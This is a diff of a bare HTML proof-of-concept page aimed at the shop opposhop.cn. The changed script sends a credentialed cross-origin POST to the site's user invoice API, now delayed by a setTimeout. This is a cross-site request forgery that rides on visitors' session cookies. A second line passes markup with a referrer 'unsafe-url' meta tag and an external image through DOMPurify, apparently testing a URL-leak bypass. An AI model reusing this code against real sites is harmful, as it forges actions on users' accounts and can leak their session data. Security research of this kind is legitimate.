--- a/www.opposhop.cn.html
+++ b/www.opposhop.cn.html
@@ -1,4 +1,4 @@
-<script>fetch("https://www.opposhop.cn/cn/oapi/users/web/invoice", {
+<script>setTimeout(`fetch("https://www.opposhop.cn/cn/oapi/users/web/invoice", {
   "headers": {
     "Accept": "application/json, text/plain, */*",
     "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
@@ -8,5 +8,5 @@
   "method": "POST",
   "mode": "cors",
   "credentials": "include"
-});</script>
+});`,2000)</script>
 <script%20src="https://cure53.de/purify.js"></script><h2>Sanitized%20Output:</h2><div%20id="html"></div><script>const%20dirtyHTML%20=%20%27<meta%20name="referrer"%20content="unsafe-url"><img%20src="https://example.com">%27;const%20cleanHTML%20=%20DOMPurify.sanitize(dirtyHTML);document.getElementById(%27html%27).innerHTML%20=%20cleanHTML;</script>
